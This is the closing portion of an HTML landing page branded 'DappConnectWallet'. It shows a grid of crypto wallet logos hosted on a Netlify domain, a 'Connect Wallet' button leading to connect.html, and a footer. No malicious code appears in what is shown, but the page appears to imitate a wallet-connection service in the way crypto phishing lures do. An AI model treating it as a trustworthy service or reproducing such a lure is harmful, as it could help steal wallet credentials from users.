                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/244a0d93a45df0d0501a9cb9cdfb4e91aa750cfd4fc88f6e97a54d8455a76f5c.jpeg" alt="EasyPocket" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">EasyPocket</div>
                                    </div>
                                </a>
                                <a href="https://mtpelerin.com/bridge-wallet" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/881946407ff22a32ec0e42b2cd31ea5dab52242dc3648d777b511a0440d59efb.jpeg" alt="Bridge Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Bridge Wallet</div>
                                    </div>
                                </a>
                                <a href="https://sparkpoint.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/3b0e861b3a57e98325b82ab687fe0a712c81366d521ceec49eebc35591f1b5d1.jpeg" alt="SparkPoint" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">SparkPoint</div>
                                    </div>
                                </a>
                                <a href="https://viawallet.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/ca86f48760bf5f84dcd6b1daca0fd55e2aa073ecf46453ba8a1db0b2e8e85ac1.jpeg" alt="ViaWallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">ViaWallet</div>
                                    </div>
                                </a>
                                <a href="https://bitkeep.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/42d72b6b34411dfacdf5364c027979908f971fc60251a817622b7bdb44a03106.jpeg" alt="BitKeep" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">BitKeep</div>
                                    </div>
                                </a>
                                <a href="https://vision-crypto.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/b642ab6de0fe5c7d1e4a2b2821c9c807a81d0f6fd42ee3a75e513ea16e91151c.jpeg" alt="Vision" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Vision</div>
                                    </div>
                                </a>
                                <a href="https://peakdefi.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/38ee551a01e3c5af9d8a9715768861e4d642e2381a62245083f96672b5646c6b.jpeg" alt="PEAKDEFI Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">PEAKDEFI Wallet</div>
                                    </div>
                                </a>
                                <a href="https://unstoppable.money/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/7e90b95230bc462869bbb59f952273d89841e1c76bcc5319898e08c9f34bd4cd.jpeg" alt="Unstoppable Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Unstoppable Wallet</div>
                                    </div>
                                </a>
                                <a href="https://halodefi.org/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/025247d02e1972362982f04c96c78e7c02c4b68a9ac2107c26fe2ebb85c317c0.jpeg" alt="HaloDeFi Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">HaloDeFi Wallet</div>
                                    </div>
                                </a>
                                <a href="https://dokwallet.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/d12b6e114af8c47a6eec19a576f1022032a5ee4f8cafee612049f4796c803c7e.jpeg" alt="Dok Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Dok Wallet</div>
                                    </div>
                                </a>
                                <a href="https://authentrend.com/at-wallet/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/3d56ed42374504f1bb2ba368094269eaea461c075ab796d504f354baac213dc5.jpeg" alt="AT.Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">AT.Wallet</div>
                                    </div>
                                </a>
                                <a href="https://midasprotocol.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/1e04cf5cddcd84edb1370b12eae1fcecedf125b77209fff80e7ef2a6d3c74719.jpeg" alt="Midas Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Midas Wallet</div>
                                    </div>
                                </a>
                                <a href="https://ellipal.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/15d1d97de89526a3c259a235304a7c510c40cda3331f0f8433da860ecc528bef.jpeg" alt="Ellipal" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Ellipal</div>
                                    </div>
                                </a>
                                <a href="https://keyring.app/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/0fa0f603076de79bbac9a4d47770186de8913da63c8a4070c500a783cddbd1e3.jpeg" alt="KEYRING PRO" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">KEYRING PRO</div>
                                    </div>
                                </a>
                                <a href="https://aktionariat.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/19ad8334f0f034f4176a95722b5746b539b47b37ce17a5abde4755956d05d44c.jpeg" alt="Aktionariat" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Aktionariat</div>
                                    </div>
                                </a>
                                <a href="https://talken.io" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/95501c1a07c8eb575cb28c753ab9044259546ebcefcd3645461086e49b671f5c.jpeg" alt="Talken Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Talken Wallet</div>
                                    </div>
                                </a>
                                <a href="https://www.xinfin.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/78640a74036794a5b7f8ea501887c168232723696db4231f54abd3fe524037b4.jpeg" alt="XinFin XDC Network" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">XinFin XDC Network</div>
                                    </div>
                                </a>
                                <a href="https://flarewallet.io" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/d612ddb7326d7d64428d035971b82247322a4ffcf126027560502eff4c02bd1c.jpeg" alt="Flare Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Flare Wallet</div>
                                    </div>
                                </a>
                                <a href="https://kyberswap.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/55e5b479c9f49ddac5445c24725857f19888da1ef432ae5e4e01f8054d107670.jpeg" alt="KyberSwap" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">KyberSwap</div>
                                    </div>
                                </a>
                                <a href="https://atoken.com" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/6193353e17504afc4bb982ee743ab970cd5cf842a35ecc9b7de61c150cf291e0.jpeg" alt="AToken Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">AToken Wallet</div>
                                    </div>
                                </a>
                                <a href="https://www.tongue.fi" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/4e6af4201658b52daad51a279bb363a08b3927e74c0f27abeca3b0110bddf0a9.jpeg" alt="Tongue Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Tongue Wallet</div>
                                    </div>
                                </a>
                                <a href="https://rsk.co/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/b13fcc7e3500a4580c9a5341ed64c49c17d7f864497881048eb160c089be5346.jpeg" alt="RWallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">RWallet</div>
                                    </div>
                                </a>
                                <a href="https://plasmapay.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/13c6a06b733edf51784f669f508826b2ab0dc80122a8b5d25d84b17d94bbdf70.jpeg" alt="PlasmaPay" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">PlasmaPay</div>
                                    </div>
                                </a>
                                <a href="https://o3.network" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/0aafbedfb8eb56dae59ecc37c9a5388509cf9c082635e3f752581cc7128a17c0.jpeg" alt="O3Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">O3Wallet</div>
                                    </div>
                                </a>
                                <a href="https://me.hashkey.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/761d3d98fd77bdb06e6c90092ee7071c6001e93401d05dcf2b007c1a6c9c222c.jpeg" alt="HashKey Me" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">HashKey Me</div>
                                    </div>
                                </a>
                                <a href="https://jadewallet.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/0a00cbe128dddd6e096ebb78533a2c16ed409152a377c1f61a6a5ea643a2d950.jpeg" alt="Jade Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Jade Wallet</div>
                                    </div>
                                </a>
                                <a href="https://guarda.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/c04ae532094873c054a6c9339746c39c9ba5839c4d5bb2a1d9db51f9e5e77266.jpeg" alt="Guarda Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Guarda Wallet</div>
                                    </div>
                                </a>
                                <a href="https://defiantapp.tech/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/ffa139f74d1c8ebbb748cf0166f92d886e8c81b521c2193aa940e00626f4e215.jpeg" alt="Defiant" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Defiant</div>
                                    </div>
                                </a>
                                <a href="https://trusteeglobal.com/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/1ce6dae0fea7114846382391d946784d95d9032460a857bb23b55bd9807259d1.jpeg" alt="Trustee Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Trustee Wallet</div>
                                    </div>
                                </a>
                                <a href="https://equal.tech/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/1ce6dae0fea7114841.jpeg" alt="Equal" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Equal</div>
                                    </div>
                                </a>
                                <a href="https://www.meet.one/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/1ce6dae0fea7114842.jpeg" alt="MEET.ONE" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">MEET.ONE</div>
                                    </div>
                                </a>
                                <a href="https://morixjp.com/eng/products/walletcard" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/1ce6dae0fea7114843.jpeg" alt="MoriX Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">MoriX Wallet</div>
                                    </div>
                                </a>
                                <a href="https://www.binance.org/en/smartChain" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/1ce6dae0fea7114845.jpeg" alt="Binance Smart Chain" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">Binance Smart Chain</div>
                                    </div>
                                </a>
                                <a href="https://safepal.io/" target="_blank" class="cursor-pointer">
                                    <div class="flex flex-col group">
                                        <div class="flex justify-center">
                                            <div class="w-12 p-0 transition duration-300 ease-in-out rounded-full group-hover:shadow-lg md:w-20 sm:w-16">
                                                <img class="inline-block w-12 rounded-full md:w-20 sm:w-16" src="https://connectdappwallet.netlify.app/logo/lg/1ce6dae0fea7114844.jpeg" alt="SafePal Wallet" />
                                            </div>
                                        </div>
                                        <div class="flex justify-center mt-4 font-semibold text-secondary group-hover:text-primary">SafePal Wallet</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
            <section class="relative bg-secondary py-10 px-6 text-white">
                <div class="container max-w-screen-lg mx-auto flex-col md:flex-row items-center md:justify-between">
                    <div class="text-center">
                        <h2 class="text-2xl font-black mb-3">Get started with DappConnectWallet today</h2>
                        <a class="cursor-pointer hover:text-primary text-white hover:bg-white bg-transparent font-bold px-5 py-3 rounded-md border-4 border-white text-center block md:inline-block" href="connect.html">Connect Wallet</a>
                    </div>
                </div>
            </section>
        </main>
        <footer class="border-t border-gray-200">
            <div class="container max-w-screen-lg mx-auto flex flex-col md:flex-row md:items-center md:justify-between py-6">
                <ul class="flex mb-4 mx-auto md:mx-0 md:ml-4 md:mb-0">
                    <li>
                        <a href="#" class="flex justify-center items-center bg-white hover:bg-white-100 rounded-full shadow transition duration-150 ease-in-out" aria-label="Twitter">
                            <svg class="w-8 h-8 fill-current" viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M24 11.5c-.6.3-1.2.4-1.9.5.7-.4 1.2-1 1.4-1.8-.6.4-1.3.6-2.1.8-.6-.6-1.5-1-2.4-1-1.7 0-3.2 1.5-3.2 3.3 0 .3 0 .5.1.7-2.7-.1-5.2-1.4-6.8-3.4-.3.5-.4 1-.4 1.7 0 1.1.6 2.1 1.5 2.7-.5 0-1-.2-1.5-.4 0 1.6 1.1 2.9 2.6 3.2-.3.1-.6.1-.9.1-.2 0-.4 0-.6-.1.4 1.3 1.6 2.3 3.1 2.3-1.1.9-2.5 1.4-4.1 1.4H8c1.5.9 3.2 1.5 5 1.5 6 0 9.3-5 9.3-9.3v-.4c.7-.5 1.3-1.1 1.7-1.8z"></path>
                                </svg>
                        </a>
                    </li>
                    <!-- li class="ml-4">
                        <a href="#" class="flex justify-center items-center bg-white hover:bg-white-100 rounded-full shadow transition duration-150 ease-in-out" aria-label="Github">
                            <svg class="w-8 h-8 fill-current" viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M16 8.2c-4.4 0-8 3.6-8 8 0 3.5 2.3 6.5 5.5 7.6.4.1.5-.2.5-.4V22c-2.2.5-2.7-1-2.7-1-.4-.9-.9-1.2-.9-1.2-.7-.5.1-.5.1-.5.8.1 1.2.8 1.2.8.7 1.3 1.9.9 2.3.7.1-.5.3-.9.5-1.1-1.8-.2-3.6-.9-3.6-4 0-.9.3-1.6.8-2.1-.1-.2-.4-1 .1-2.1 0 0 .7-.2 2.2.8.6-.2 1.3-.3 2-.3s1.4.1 2 .3c1.5-1 2.2-.8 2.2-.8.4 1.1.2 1.9.1 2.1.5.6.8 1.3.8 2.1 0 3.1-1.9 3.7-3.7 3.9.3.4.6.9.6 1.6v2.2c0 .2.1.5.6.4 3.2-1.1 5.5-4.1 5.5-7.6-.1-4.4-3.7-8-8.1-8z"></path>
                                </svg>
                        </a>
                    </li-->

                </ul>
                <div class="text-sm text-center md:text-right">
                    ©
                    <!-- -->
                    2022
                    <!-- -->
                    <a class="hover:underline" href="/">DappConnectWalletme.com</a>
                </div>
            </div>
        </footer>
    </div>
    <script id="__NEXT_DATA__" type="application/json">
        {
            "props": {
                "pageProps": {}
            },
            "page": "/",
            "query": {},
            "buildId": "5LH9GdAXPhV9OnKcu2OUo",
            "nextExport": true,
            "autoExport": true,
            "isFallback": false
        }
    </script>
    <script nomodule="" src="/_next/static/chunks/polyfills-eef578260fd80f8fff94.js"></script>
    <!--script src="/_next/static/chunks/webpack-189c53927ffd3caf09c3.js" async=""></script-->
    <script src="/_next/static/chunks/framework-92300432a1172ef1338b.js" async=""></script>
    <script src="/_next/static/chunks/main-71948af4b0f09c0fc30e.js" async=""></script>
    <script src="/_next/static/chunks/pages/_app-9e366951ad03f095f5b3.js" async=""></script>
    <script src="/_next/static/chunks/814-16eda819eff2e28d39ff.js" async=""></script>
    <script src="/_next/static/chunks/748-ecf7ef402c655d9fd446.js" async=""></script>
    <script src="/_next/static/chunks/pages/index-ec7c947b1f1bbe86fe3b.js" async=""></script>
    <script src="/_next/static/5LH9GdAXPhV9OnKcu2OUo/_buildManifest.js" async=""></script>
    <script src="/_next/static/5LH9GdAXPhV9OnKcu2OUo/_ssgManifest.js" async=""></script>
</body>

</html>